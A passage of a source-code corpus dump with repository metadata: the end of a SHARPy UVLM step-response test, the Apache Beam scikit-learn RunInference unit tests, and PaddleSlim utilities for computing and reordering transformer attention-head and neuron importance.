er_th_1perc = np.max(Er_f_tot[ts1perc:])
### ----- generate plot
if self.ProducePlots:
# sections to plot
if Nsurf == 1:
Nplot = [0, N // 2, N]
labs = [r'tip', r'root', r'tip']
elif Nsurf == 2:
Nplot = [0, N // 2 - 1]
labs = [r'tip', r'near root', r'tip', r'near root']
axtitle = [r'$C_{F_y}$', r'$C_{F_z}$']
# non-dimensional time
sv = 2.0 * Uinf0 * tv / ws.c_ref
# generate figure
clist = ['#003366', '#CC3333', '#336633', '#FF6600'] * 4
fontlabel = 12
std_params = {'legend.fontsize': 10,
'font.size': fontlabel,
'xtick.labelsize': fontlabel - 2,
'ytick.labelsize': fontlabel - 2,
'figure.autolayout': True,
'legend.numpoints': 1}
# plt.rcParams.update(std_params)
# fig = plt.figure('Lift time-history', (12, 6))
# axvec = fig.subplots(1, 2)
# for aa in [0, 1]:
# comp = aa + 1
# axvec[aa].set_title(axtitle[aa])
# axvec[aa].plot(sv, Cfvec_an[:, comp] / Cl_inf, lw=4, ls='-',
# alpha=0.5, color='r', label=r'Wagner')
# axvec[aa].plot(sv, Ftot[:, comp] / Cl_inf, lw=5, ls=':',
# alpha=0.7, color='k', label=r'Total')
# cc = 0
# for ss in range(Nsurf):
# for nn in Nplot:
# axvec[aa].plot(sv, Fsect[:, ss, comp, nn] / Cl_inf,
# lw=4 - cc, ls='--', alpha=0.7, color=clist[cc],
# label=r'Surf. %.1d, n=%.2d (%s)' % (ss, nn, labs[cc]))
# cc += 1
# axvec[aa].grid(color='0.8', ls='-')
# axvec[aa].grid(color='0.85', ls='-', which='minor')
# axvec[aa].set_xlabel(r'normalised time $t=2 U_\infty \tilde{t}/c$')
# axvec[aa].set_ylabel(axtitle[aa] + r'$/C_{l_\infty}$')
# axvec[aa].set_xlim(0, sv[-1])
# if Cfvec_inf[comp] > 0.:
# axvec[aa].set_ylim(0, 1.1)
# else:
# axvec[aa].set_ylim(-1.1, 0)
# plt.legend(ncol=1)
# # plt.show()
# fig.savefig(self.figfold + self.case_main + '.png')
# fig.savefig(self.figfold + self.case_main + '.pdf')
# plt.close()
assert er_th_2perc < 2e-2 and er_th_1perc < 1e-2, \
'Error of dynamic step response at time-steps 16 and 36 ' + \
'(%.2e and %.2e) too large. Verify Linear UVLM.' % (er_th_2perc, er_th_1perc)
def start_writer(self):
# Over write writer with print_file False to avoid I/O errors
global cout_wrap
cout_wrap = cout.Writer()
# cout_wrap.initialise(print_screen=False, print_file=False)
cout_wrap.cout_quiet()
sharpy.utils.cout_utils.cout_wrap = cout_wrap
def tearDown(self):
cout.finish_writer()
try:
shutil.rmtree(self.route_test_dir + '/res/')
shutil.rmtree(self.route_test_dir + '/figs/')
shutil.rmtree(self.route_test_dir + '/output/')
except FileNotFoundError:
pass
if __name__ == '__main__':
if os.path.exists('./figs/infinite_span'):
shutil.rmtree('./figs/infinite_span')
unittest.main()
|
39ddee3b218539e6e0049166a214662e57072908
|
d1c2d00078520cd556f60b7213c27856f8b3460d
|
/sdks/python/apache_beam/ml/inference/sklearn_inference_test.py
|
c2ea9fa1e95597dd6992c748a31c29b9a72757d1
|
[
"BSD-3-Clause",
"MIT",
"LicenseRef-scancode-protobuf",
"Apache-2.0",
"Python-2.0"
] |
permissive
|
apache/beam
|
ed11b9e043465c720659eac20ac71b5b171bfa88
|
6d5048e05087ea54abc889ce402ae2a0abb9252b
|
refs/heads/master
| 2023-09-04T07:41:07.002653
| 2023-09-01T23:01:05
| 2023-09-01T23:01:05
| 50,904,245
| 7,061
| 4,522
|
Apache-2.0
| 2023-09-14T21:43:38
| 2016-02-02T08:00:06
|
Java
|
UTF-8
|
Python
| false
| false
| 23,120
|
py
|
sklearn_inference_test.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# pytype: skip-file
import io
import math
import os
import pickle
import platform
import shutil
import sys
import tempfile
import unittest
from typing import Any
from typing import Dict
from typing import Optional
from typing import Sequence
import joblib
import numpy
import pandas
from sklearn import linear_model
from sklearn import svm
from sklearn.base import BaseEstimator
from sklearn.compose import ColumnTransformer
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import OneHotEncoder
from sklearn.preprocessing import StandardScaler
import apache_beam as beam
from apache_beam.ml.inference.base import KeyedModelHandler
from apache_beam.ml.inference.base import PredictionResult
from apache_beam.ml.inference.base import RunInference
from apache_beam.ml.inference.sklearn_inference import ModelFileType
from apache_beam.ml.inference.sklearn_inference import SklearnModelHandlerNumpy
from apache_beam.ml.inference.sklearn_inference import SklearnModelHandlerPandas
from apache_beam.ml.inference.sklearn_inference import _default_numpy_inference_fn
from apache_beam.ml.inference.sklearn_inference import _default_pandas_inference_fn
from apache_beam.testing.test_pipeline import TestPipeline
from apache_beam.testing.util import assert_that
from apache_beam.testing.util import equal_to
def _compare_prediction_result(a, b):
example_equal = numpy.array_equal(a.example, b.example)
if isinstance(a.inference, dict):
return all(
x == y for x, y in zip(a.inference.values(),
b.inference.values())) and example_equal
return a.inference == b.inference and example_equal
def _compare_dataframe_predictions(a_in, b_in):
keys_equal = True
if isinstance(a_in, tuple) and not isinstance(a_in, PredictionResult):
a_key, a = a_in
b_key, b = b_in
keys_equal = a_key == b_key
else:
a = a_in
b = b_in
example_equal = pandas.DataFrame.equals(a.example, b.example)
if isinstance(a.inference, dict):
return all(
math.floor(a) == math.floor(b) for a,
b in zip(a.inference.values(), b.inference.values())) and example_equal
inference_equal = math.floor(a.inference) == math.floor(b.inference)
return inference_equal and example_equal and keys_equal
class FakeModel:
def __init__(self):
self.total_predict_calls = 0
def predict(self, input_vector: numpy.ndarray):
self.total_predict_calls += 1
return numpy.sum(input_vector, axis=1)
class FakeNumpyModelDictOut:
def __init__(self):
self.total_predict_calls = 0
def predict(self, input_vector: numpy.ndarray):
self.total_predict_calls += 1
out = numpy.sum(input_vector, axis=1)
return {"out1": out, "out2": out}
class FakePandasModelDictOut:
def __init__(self):
self.total_predict_calls = 0
def predict(self, df: pandas.DataFrame):
self.total_predict_calls += 1
out = df.loc[:, 'number_2']
return {"out1": out, "out2": out}
def build_model():
x = [[0, 0], [1, 1]]
y = [0, 1]
model = svm.SVC()
model.fit(x, y)
return model
def pandas_dataframe():
csv_string = (
'category_1,number_1,category_2,number_2,label,number_3\n'
'red,4,frog,5,6,7\n'
'blue,3,horse,8,9,10\n'
'red,0,cow,1,2,3\n'
'blue,4,frog,1,1,1\n'
'red,1,horse,4,2,3')
csv_string_io = io.StringIO(csv_string)
return pandas.read_csv(csv_string_io)
def build_pandas_pipeline():
"""Builds a common type of pandas pipeline with preprocessing."""
categorical_columns = ['category_1', 'category_2']
numerical_columns = ['number_1', 'number_2', 'number_3']
categorical_transformer = OneHotEncoder(handle_unknown='ignore')
numerical_transformer = StandardScaler()
preprocessor = ColumnTransformer(
transformers=[
("numerical", numerical_transformer, numerical_columns),
("categorical", categorical_transformer, categorical_columns),
])
pipeline = Pipeline(
steps=[("preprocessor",
preprocessor), ("classifier", linear_model.SGDRegressor())])
data = pandas_dataframe()
labels = data['label']
pipeline.fit(data, labels)
return pipeline
def convert_inference_to_floor(prediction_result):
return math.floor(prediction_result.inference)
def alternate_numpy_inference_fn(
model: BaseEstimator,
batch: Sequence[numpy.ndarray],
inference_args: Optional[Dict[str, Any]] = None) -> Any:
return [0]
def alternate_pandas_inference_fn(
model: BaseEstimator,
batch: Sequence[pandas.DataFrame],
inference_args: Optional[Dict[str, Any]] = None) -> Any:
# vectorize data for better performance
vectorized_batch = pandas.concat(batch, axis=0)
predictions = model.predict(vectorized_batch)
splits = [
vectorized_batch.iloc[[i]] for i in range(vectorized_batch.shape[0])
]
predictions = predictions - 1
return predictions, splits
class SkLearnRunInferenceTest(unittest.TestCase):
def setUp(self):
self.tmpdir = tempfile.mkdtemp()
def tearDown(self):
shutil.rmtree(self.tmpdir)
def test_predict_output(self):
fake_model = FakeModel()
inference_runner = SklearnModelHandlerNumpy(model_uri='unused')
batched_examples = [
numpy.array([1, 2, 3]), numpy.array([4, 5, 6]), numpy.array([7, 8, 9])
]
expected_predictions = [
PredictionResult(numpy.array([1, 2, 3]), 6),
PredictionResult(numpy.array([4, 5, 6]), 15),
PredictionResult(numpy.array([7, 8, 9]), 24)
]
inferences = inference_runner.run_inference(batched_examples, fake_model)
for actual, expected in zip(inferences, expected_predictions):
self.assertTrue(_compare_prediction_result(actual, expected))
def test_custom_inference_fn(self):
fake_model = FakeModel()
inference_runner = SklearnModelHandlerNumpy(
model_uri='unused', inference_fn=alternate_numpy_inference_fn)
batched_examples = [
numpy.array([1, 2, 3]), numpy.array([4, 5, 6]), numpy.array([7, 8, 9])
]
expected_predictions = [
PredictionResult(numpy.array([1, 2, 3]), 0),
PredictionResult(numpy.array([4, 5, 6]), 0),
PredictionResult(numpy.array([7, 8, 9]), 0)
]
inferences = inference_runner.run_inference(batched_examples, fake_model)
for actual, expected in zip(inferences, expected_predictions):
self.assertTrue(_compare_prediction_result(actual, expected))
def test_predict_output_dict(self):
fake_model = FakeNumpyModelDictOut()
inference_runner = SklearnModelHandlerNumpy(model_uri='unused')
batched_examples = [
numpy.array([1, 2, 3]), numpy.array([4, 5, 6]), numpy.array([7, 8, 9])
]
expected_predictions = [
PredictionResult(numpy.array([1, 2, 3]), {
"out1": 6, "out2": 6
}),
PredictionResult(numpy.array([4, 5, 6]), {
"out1": 15, "out2": 15
}),
PredictionResult(numpy.array([7, 8, 9]), {
"out1": 24, "out2": 24
})
]
inferences = inference_runner.run_inference(batched_examples, fake_model)
for actual, expected in zip(inferences, expected_predictions):
self.assertTrue(_compare_prediction_result(actual, expected))
def test_data_vectorized(self):
fake_model = FakeModel()
inference_runner = SklearnModelHandlerNumpy(model_uri='unused')
batched_examples = [
numpy.array([1, 2, 3]), numpy.array([4, 5, 6]), numpy.array([7, 8, 9])
]
# even though there are 3 examples, the data should
# be vectorized and only 1 call should happen.
inference_runner.run_inference(batched_examples, fake_model)
self.assertEqual(1, fake_model.total_predict_calls)
def test_num_bytes_numpy(self):
inference_runner = SklearnModelHandlerNumpy(model_uri='unused')
batched_examples_int = [
numpy.array([1, 2, 3]), numpy.array([4, 5, 6]), numpy.array([7, 8, 9])
]
self.assertEqual(
sys.getsizeof(batched_examples_int[0]) * 3,
inference_runner.get_num_bytes(batched_examples_int))
batched_examples_float = [
numpy.array([1.0, 2.0, 3.0]),
numpy.array([4.1, 5.2, 6.3]),
numpy.array([7.7, 8.8, 9.9])
]
self.assertEqual(
sys.getsizeof(batched_examples_float[0]) * 3,
inference_runner.get_num_bytes(batched_examples_float))
def test_pipeline_pickled(self):
temp_file_name = self.tmpdir + os.sep + 'pickled_file'
with open(temp_file_name, 'wb') as file:
pickle.dump(build_model(), file)
with TestPipeline() as pipeline:
examples = [numpy.array([0, 0]), numpy.array([1, 1])]
pcoll = pipeline | 'start' >> beam.Create(examples)
actual = pcoll | RunInference(
SklearnModelHandlerNumpy(model_uri=temp_file_name))
expected = [
PredictionResult(numpy.array([0, 0]), 0),
PredictionResult(numpy.array([1, 1]), 1)
]
assert_that(
actual, equal_to(expected, equals_fn=_compare_prediction_result))
def test_pipeline_pickled_custom_batching(self):
temp_file_name = self.tmpdir + os.sep + 'pickled_file'
with open(temp_file_name, 'wb') as file:
pickle.dump(build_model(), file)
def batch_validator_numpy_inference_fn(
model: BaseEstimator,
batch: Sequence[numpy.ndarray],
inference_args: Optional[Dict[str, Any]] = None) -> Any:
if len(batch) != 2:
raise Exception(
f'Expected batch of size 2, received batch of size {len(batch)}')
return _default_numpy_inference_fn(model, batch, inference_args)
with TestPipeline() as pipeline:
examples = [numpy.array([0, 0]), numpy.array([1, 1])]
pcoll = pipeline | 'start' >> beam.Create(examples)
actual = pcoll | RunInference(
SklearnModelHandlerNumpy(
model_uri=temp_file_name,
inference_fn=batch_validator_numpy_inference_fn,
min_batch_size=2,
max_batch_size=2))
expected = [
PredictionResult(numpy.array([0, 0]), 0),
PredictionResult(numpy.array([1, 1]), 1)
]
assert_that(
actual, equal_to(expected, equals_fn=_compare_prediction_result))
def test_pipeline_pickled_large_model(self):
temp_file_name = self.tmpdir + os.sep + 'pickled_file'
with open(temp_file_name, 'wb') as file:
pickle.dump(build_model(), file)
def large_model_validator_numpy_inference_fn(
model: BaseEstimator,
batch: Sequence[numpy.ndarray],
inference_args: Optional[Dict[str, Any]] = None) -> Any:
multi_process_shared_loaded = "multi_process_shared" in str(type(model))
if not multi_process_shared_loaded:
raise Exception(
f'Loaded model of type {type(model)}, was ' +
'expecting multi_process_shared_model')
return _default_numpy_inference_fn(model, batch, inference_args)
with TestPipeline() as pipeline:
examples = [numpy.array([0, 0]), numpy.array([1, 1])]
pcoll = pipeline | 'start' >> beam.Create(examples)
actual = pcoll | RunInference(
SklearnModelHandlerNumpy(
model_uri=temp_file_name,
inference_fn=large_model_validator_numpy_inference_fn,
large_model=True))
expected = [
PredictionResult(numpy.array([0, 0]), 0),
PredictionResult(numpy.array([1, 1]), 1)
]
assert_that(
actual, equal_to(expected, equals_fn=_compare_prediction_result))
def test_pipeline_joblib(self):
temp_file_name = self.tmpdir + os.sep + 'joblib_file'
with open(temp_file_name, 'wb') as file:
joblib.dump(build_model(), file)
with TestPipeline() as pipeline:
examples = [numpy.array([0, 0]), numpy.array([1, 1])]
pcoll = pipeline | 'start' >> beam.Create(examples)
actual = pcoll | RunInference(
SklearnModelHandlerNumpy(
model_uri=temp_file_name, model_file_type=ModelFileType.JOBLIB))
expected = [
PredictionResult(numpy.array([0, 0]), 0),
PredictionResult(numpy.array([1, 1]), 1)
]
assert_that(
actual, equal_to(expected, equals_fn=_compare_prediction_result))
def test_bad_file_raises(self):
with self.assertRaises(RuntimeError):
with TestPipeline() as pipeline:
examples = [numpy.array([0, 0])]
pcoll = pipeline | 'start' >> beam.Create(examples)
_ = pcoll | RunInference(
SklearnModelHandlerNumpy(model_uri='/var/bad_file_name'))
pipeline.run()
def test_bad_input_type_raises(self):
with self.assertRaisesRegex(AssertionError,
'Unsupported serialization type'):
with tempfile.NamedTemporaryFile(delete=False) as file:
model_handler = SklearnModelHandlerNumpy(
model_uri=file.name, model_file_type=None)
model_handler.load_model()
def test_env_vars_set_correctly_numpy(self):
temp_file_name = self.tmpdir + os.sep + 'pickled_file'
with open(temp_file_name, 'wb') as file:
pickle.dump(build_model(), file)
handler_with_vars = SklearnModelHandlerNumpy(
env_vars={'FOO': 'bar'}, model_uri=temp_file_name)
os.environ.pop('FOO', None)
self.assertFalse('FOO' in os.environ)
examples = [numpy.array([0, 0]), numpy.array([1, 1])]
with TestPipeline() as pipeline:
_ = (
pipeline
| 'start' >> beam.Create(examples)
| RunInference(handler_with_vars))
pipeline.run()
self.assertTrue('FOO' in os.environ)
self.assertTrue((os.environ['FOO']) == 'bar')
def test_pipeline_pandas(self):
temp_file_name = self.tmpdir + os.sep + 'pickled_file'
with open(temp_file_name, 'wb') as file:
pickle.dump(build_pandas_pipeline(), file)
with TestPipeline() as pipeline:
dataframe = pandas_dataframe()
splits = [dataframe.loc[[i]] for i in dataframe.index]
pcoll = pipeline | 'start' >> beam.Create(splits)
actual = pcoll | RunInference(
SklearnModelHandlerPandas(model_uri=temp_file_name))
expected = [
PredictionResult(splits[0], 5),
PredictionResult(splits[1], 8),
PredictionResult(splits[2], 1),
PredictionResult(splits[3], 1),
PredictionResult(splits[4], 2),
]
assert_that(
actual, equal_to(expected, equals_fn=_compare_dataframe_predictions))
def test_pipeline_pandas_env_vars_set_correctly(self):
temp_file_name = self.tmpdir + os.sep + 'pickled_file'
with open(temp_file_name, 'wb') as file:
pickle.dump(build_pandas_pipeline(), file)
handler_with_vars = SklearnModelHandlerPandas(
env_vars={'FOO': 'bar'}, model_uri=temp_file_name)
os.environ.pop('FOO', None)
self.assertFalse('FOO' in os.environ)
with TestPipeline() as pipeline:
dataframe = pandas_dataframe()
splits = [dataframe.loc[[i]] for i in dataframe.index]
_ = (
pipeline
| 'start' >> beam.Create(splits)
| RunInference(handler_with_vars))
pipeline.run()
self.assertTrue('FOO' in os.environ)
self.assertTrue((os.environ['FOO']) == 'bar')
def test_pipeline_pandas_custom_batching(self):
temp_file_name = self.tmpdir + os.sep + 'pickled_file'
with open(temp_file_name, 'wb') as file:
pickle.dump(build_pandas_pipeline(), file)
def batch_validator_pandas_inference_fn(
model: BaseEstimator,
batch: Sequence[numpy.ndarray],
inference_args: Optional[Dict[str, Any]] = None) -> Any:
if len(batch) != 5:
raise Exception(
f'Expected batch of size 5, received batch of size {len(batch)}')
return _default_pandas_inference_fn(model, batch, inference_args)
with TestPipeline() as pipeline:
dataframe = pandas_dataframe()
splits = [dataframe.loc[[i]] for i in dataframe.index]
pcoll = pipeline | 'start' >> beam.Create(splits)
actual = pcoll | RunInference(
SklearnModelHandlerPandas(
model_uri=temp_file_name,
inference_fn=batch_validator_pandas_inference_fn,
min_batch_size=5,
max_batch_size=5))
expected = [
PredictionResult(splits[0], 5),
PredictionResult(splits[1], 8),
PredictionResult(splits[2], 1),
PredictionResult(splits[3], 1),
PredictionResult(splits[4], 2),
]
assert_that(
actual, equal_to(expected, equals_fn=_compare_dataframe_predictions))
def test_pipeline_pandas_large_model(self):
temp_file_name = self.tmpdir + os.sep + 'pickled_file'
with open(temp_file_name, 'wb') as file:
pickle.dump(build_pandas_pipeline(), file)
def large_model_validator_pandas_inference_fn(
model: BaseEstimator,
batch: Sequence[numpy.ndarray],
inference_args: Optional[Dict[str, Any]] = None) -> Any:
multi_process_shared_loaded = "multi_process_shared" in str(type(model))
if not multi_process_shared_loaded:
raise Exception(
f'Loaded model of type {type(model)}, was ' +
'expecting multi_process_shared_model')
return _default_pandas_inference_fn(model, batch, inference_args)
with TestPipeline() as pipeline:
dataframe = pandas_dataframe()
splits = [dataframe.loc[[i]] for i in dataframe.index]
pcoll = pipeline | 'start' >> beam.Create(splits)
actual = pcoll | RunInference(
SklearnModelHandlerPandas(
model_uri=temp_file_name,
inference_fn=large_model_validator_pandas_inference_fn,
large_model=True))
expected = [
PredictionResult(splits[0], 5),
PredictionResult(splits[1], 8),
PredictionResult(splits[2], 1),
PredictionResult(splits[3], 1),
PredictionResult(splits[4], 2),
]
assert_that(
actual, equal_to(expected, equals_fn=_compare_dataframe_predictions))
def test_pipeline_pandas_custom_inference(self):
temp_file_name = self.tmpdir + os.sep + 'pickled_file'
with open(temp_file_name, 'wb') as file:
pickle.dump(build_pandas_pipeline(), file)
with TestPipeline() as pipeline:
dataframe = pandas_dataframe()
splits = [dataframe.loc[[i]] for i in dataframe.index]
pcoll = pipeline | 'start' >> beam.Create(splits)
actual = pcoll | RunInference(
SklearnModelHandlerPandas(
model_uri=temp_file_name,
inference_fn=alternate_pandas_inference_fn))
expected = [
PredictionResult(splits[0], 4),
PredictionResult(splits[1], 7),
PredictionResult(splits[2], 0),
PredictionResult(splits[3], 0),
PredictionResult(splits[4], 1),
]
assert_that(
actual, equal_to(expected, equals_fn=_compare_dataframe_predictions))
def test_pipeline_pandas_dict_out(self):
temp_file_name = self.tmpdir + os.sep + 'pickled_file'
with open(temp_file_name, 'wb') as file:
pickle.dump(FakePandasModelDictOut(), file)
with TestPipeline() as pipeline:
dataframe = pandas_dataframe()
splits = [dataframe.loc[[i]] for i in dataframe.index]
pcoll = pipeline | 'start' >> beam.Create(splits)
actual = pcoll | RunInference(
SklearnModelHandlerPandas(model_uri=temp_file_name))
expected = [
PredictionResult(splits[0], {
'out1': 5, 'out2': 5
}),
PredictionResult(splits[1], {
'out1': 8, 'out2': 8
}),
PredictionResult(splits[2], {
'out1': 1, 'out2': 1
}),
PredictionResult(splits[3], {
'out1': 1, 'out2': 1
}),
PredictionResult(splits[4], {
'out1': 4, 'out2': 4
}),
]
assert_that(
actual, equal_to(expected, equals_fn=_compare_dataframe_predictions))
@unittest.skipIf(platform.system() == 'Windows', 'BEAM-14359')
def test_pipeline_pandas_joblib(self):
temp_file_name = self.tmpdir + os.sep + 'pickled_file'
with open(temp_file_name, 'wb') as file:
joblib.dump(build_pandas_pipeline(), file)
with TestPipeline() as pipeline:
dataframe = pandas_dataframe()
splits = [dataframe.loc[[i]] for i in dataframe.index]
pcoll = pipeline | 'start' >> beam.Create(splits)
actual = pcoll | RunInference(
SklearnModelHandlerPandas(
model_uri=temp_file_name, model_file_type=ModelFileType.JOBLIB))
expected = [
PredictionResult(splits[0], 5),
PredictionResult(splits[1], 8),
PredictionResult(splits[2], 1),
PredictionResult(splits[3], 1),
PredictionResult(splits[4], 2),
]
assert_that(
actual, equal_to(expected, equals_fn=_compare_dataframe_predictions))
def test_pipeline_pandas_with_keys(self):
temp_file_name = self.tmpdir + os.sep + 'pickled_file'
with open(temp_file_name, 'wb') as file:
pickle.dump(build_pandas_pipeline(), file)
with TestPipeline() as pipeline:
data_frame = pandas_dataframe()
keys = [str(i) for i in range(5)]
splits = [data_frame.loc[[i]] for i in data_frame.index]
keyed_rows = [(key, value) for key, value in zip(keys, splits)]
pcoll = pipeline | 'start' >> beam.Create(keyed_rows)
actual = pcoll | RunInference(
KeyedModelHandler(
SklearnModelHandlerPandas(model_uri=temp_file_name)))
expected = [
('0', PredictionResult(splits[0], 5)),
('1', PredictionResult(splits[1], 8)),
('2', PredictionResult(splits[2], 1)),
('3', PredictionResult(splits[3], 1)),
('4', PredictionResult(splits[4], 2)),
]
assert_that(
actual, equal_to(expected, equals_fn=_compare_dataframe_predictions))
def test_infer_too_many_rows_in_dataframe(self):
with self.assertRaisesRegex(
ValueError, r'Only dataframes with single rows are supported'):
data_frame_too_many_rows = pandas_dataframe()
fake_model = FakeModel()
inference_runner = SklearnModelHandlerPandas(model_uri='unused')
inference_runner.run_inference([data_frame_too_many_rows], fake_model)
if __name__ == '__main__':
unittest.main()
|
6b59cf2972ac1a05d6287e98a143e7e977f30dea
|
b04cc98a746d1df457183bc14908094a8be00ba1
|
/paddleslim/nas/ofa/utils/nlp_utils.py
|
88c167ff0cf98ec4cfbb9b6f6fb0308095931752
|
[
"Apache-2.0"
] |
permissive
|
PaddlePaddle/PaddleSlim
|
a3bcaef0c92016b7f6946d58787f87c7db8ff3f8
|
bb02b103a89a09635941bc0bbbd38506d7412468
|
refs/heads/develop
| 2023-08-31T01:47:27.824722
| 2023-08-25T08:06:08
| 2023-08-25T08:06:08
| 228,290,594
| 1,534
| 402
|
Apache-2.0
| 2023-08-29T09:37:55
| 2019-12-16T02:56:50
|
Python
|
UTF-8
|
Python
| false
| false
| 11,436
|
py
|
nlp_utils.py
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import numpy as np
import paddle
__all__ = ["compute_neuron_head_importance", "reorder_head", "reorder_neuron"]
def compute_neuron_head_importance(task_name,
model,
data_loader,
num_layers,
num_heads,
loss_fct=paddle.nn.loss.CrossEntropyLoss(),
intermediate_name='linear1',
output_name='linear2'):
"""
Compute the importance of multi-head attention and feed-forward neuron in each transformer layer.
Args:
task_name(str): task name.
model(paddle.nn.Layer): the instance of transformer model.
data_loader(DataLoader): An iterable data loader is used for evaluate. An instance of `paddle.io.Dataloader`.
num_layers(int): number of transformer layers.
num_heads(int): number of heads in each multi-head attention.
loss_fct(Loss|optional): loss function can be a `paddle.nn.Layer` instance. Default: `nn.loss.CrossEntropyLoss()`.
intermediate_name(str|optional): the name of intermediate `Linear` layer in feed-forward. Default: `linear1`.
output_name(str|optional): the name of output `Linear` layer in feed-forward. Default: `linear2`.
"""
head_importance = paddle.zeros(
shape=[num_layers, num_heads], dtype='float32')
head_mask = paddle.ones(shape=[num_layers, num_heads], dtype='float32')
head_mask.stop_gradient = False
intermediate_weight = []
intermediate_bias = []
output_weight = []
for name, w in model.named_parameters():
if intermediate_name in name:
if len(w.shape) > 1:
intermediate_weight.append(w)
else:
intermediate_bias.append(w)
if output_name in name:
if len(w.shape) > 1:
output_weight.append(w)
neuron_importance = []
for w in intermediate_weight:
neuron_importance.append(np.zeros(shape=[w.shape[1]], dtype='float32'))
if task_name.lower() != 'mnli':
data_loader = (data_loader, )
for data in data_loader:
for batch in data:
if isinstance(batch, dict):
input_ids, segment_ids, labels = batch['input_ids'], batch[
'token_type_ids'], batch['labels']
else:
input_ids, segment_ids, labels = batch
logits = model(
input_ids, segment_ids, attention_mask=[None, head_mask])
loss = loss_fct(logits, labels)
loss.backward()
head_importance += paddle.abs(
paddle.to_tensor(head_mask.gradient()))
for w1, b1, w2, current_importance in zip(
intermediate_weight, intermediate_bias, output_weight,
neuron_importance):
current_importance += np.abs(
(np.sum(w1.numpy() * w1.gradient(), axis=0) + b1.numpy() *
b1.gradient()))
current_importance += np.abs(
np.sum(w2.numpy() * w2.gradient(), axis=1))
return head_importance, neuron_importance
def reorder_head(layer, index):
"""
Reorder head weights according index.
Args:
layer(paddle.nn.Layer): the instance of `paddle.nn.MultiHeadAttention` layer.
index(list): the sort indices of multi-head.
"""
assert isinstance(layer, paddle.nn.MultiHeadAttention), \
"layer in reorder_head must be the instance of `paddle.nn.MultiHeadAttention`."
n, a = layer.num_heads, layer.head_dim
idx = paddle.reshape(
paddle.index_select(
paddle.reshape(
paddle.arange(
0, n * a, dtype='int64'), shape=[n, a]),
index=index,
axis=0),
shape=[-1])
def reorder_head_matrix(linearLayer, index, dim=1):
W = paddle.index_select(linearLayer.weight, index, axis=dim).detach()
if linearLayer.bias is not None:
if dim == 0:
b = paddle.assign(linearLayer.bias).detach()
else:
b = paddle.assign(
paddle.index_select(
linearLayer.bias, index, axis=0)).detach()
linearLayer.weight.stop_gradient = True
linearLayer.weight.set_value(W)
linearLayer.weight.stop_gradient = False
if linearLayer.bias is not None:
linearLayer.bias.stop_gradient = True
linearLayer.bias.set_value(b)
linearLayer.bias.stop_gradient = False
reorder_head_matrix(
layer.q_proj.fn if hasattr(layer.q_proj, 'fn') else layer.q_proj, idx)
reorder_head_matrix(
layer.k_proj.fn if hasattr(layer.k_proj, 'fn') else layer.k_proj, idx)
reorder_head_matrix(
layer.v_proj.fn if hasattr(layer.v_proj, 'fn') else layer.v_proj, idx)
reorder_head_matrix(
layer.out_proj.fn if hasattr(layer.out_proj, 'fn') else layer.out_proj,
idx,
dim=0)
def reorder_neuron(layer, index, dim=0):
"""
Reorder feed-forward weights according index.
Args:
layer(paddle.nn.Layer): the instance of `paddle.nn.Linear` layer.
index(list): the sort indices of feed-forward.
dim(int): select weights according to the dim.
"""
linearLayer = layer.fn if hasattr(layer, 'fn') else layer
W = paddle.index_select(linearLayer.weight, index, axis=dim).detach()
if linearLayer.bias is not None:
if dim == 0:
b = paddle.assign(linearLayer.bias).detach()
else:
b = paddle.assign(
paddle.index_select(
linearLayer.bias, index, axis=0)).detach()
linearLayer.weight.stop_gradient = True
linearLayer.weight.set_value(W)
linearLayer.weight.stop_gradient = False
if linearLayer.bias is not None:
linearLayer.bias.stop_gradient = True
linearLayer.bias.set_value(b)
linearLayer.bias.stop_gradient = False
### monkey patch for MultiHeadAttention _prepare_qkv to change num_heads.
def _prepare_qkv(self, query, key, value, cache=None):
q = self.q_proj(query)
if hasattr(self.q_proj,
'fn') and self.q_proj.fn.cur_config['expand_ratio'] != None:
self.num_heads = int(self.num_heads *
self.q_proj.fn.cur_config['expand_ratio'])
q = paddle.reshape(x=q, shape=[0, 0, self.num_heads, self.head_dim])
q = paddle.transpose(x=q, perm=[0, 2, 1, 3])
if isinstance(cache, self.StaticCache):
# for encoder-decoder attention in inference and has cached
k, v = cache.k, cache.v
else:
k, v = self.compute_kv(key, value)
if isinstance(cache, self.Cache):
# for decoder self-attention in inference
k = paddle.concat([cache.k, k], axis=2)
v = paddle.concat([cache.v, v], axis=2)
cache = self.Cache(k, v)
return (q, k, v) if cache is None else (q, k, v, cache)
### monkey patch for MultiHeadAttention forward to accept head_mask
### attn_mask[0] = attn_mask, attn_mask[1] = head_mask
def _mha_forward(self, query, key, value, attn_mask=None, cache=None):
key = query if key is None else key
value = query if value is None else value
# compute q ,k ,v
if cache is None:
q, k, v = self._prepare_qkv(query, key, value, cache)
else:
q, k, v, cache = self._prepare_qkv(query, key, value, cache)
# scale dot product attention
# TODO: use paddle.matmul, however it doesn't support `alpha`
product = paddle.matmul(x=q, y=k, transpose_y=True)
if attn_mask[0] is not None:
# TODO(guosheng): support bool mask
product = product + attn_mask[0]
weights = paddle.nn.functional.softmax(product)
if self.dropout:
weights = paddle.nn.functional.dropout(
weights,
self.dropout,
training=self.training,
mode="upscale_in_train")
if attn_mask[1] is not None:
weights = weights * attn_mask[1]
out = paddle.matmul(weights, v)
# combine heads
out = paddle.transpose(out, perm=[0, 2, 1, 3])
out = paddle.reshape(x=out, shape=[0, 0, out.shape[2] * out.shape[3]])
# project to output
out = self.out_proj(out)
outs = [out]
if self.need_weights:
outs.append(weights)
if cache is not None:
outs.append(cache)
if hasattr(self.q_proj,
'fn') and self.q_proj.fn.cur_config['expand_ratio'] != None:
self.num_heads = int(
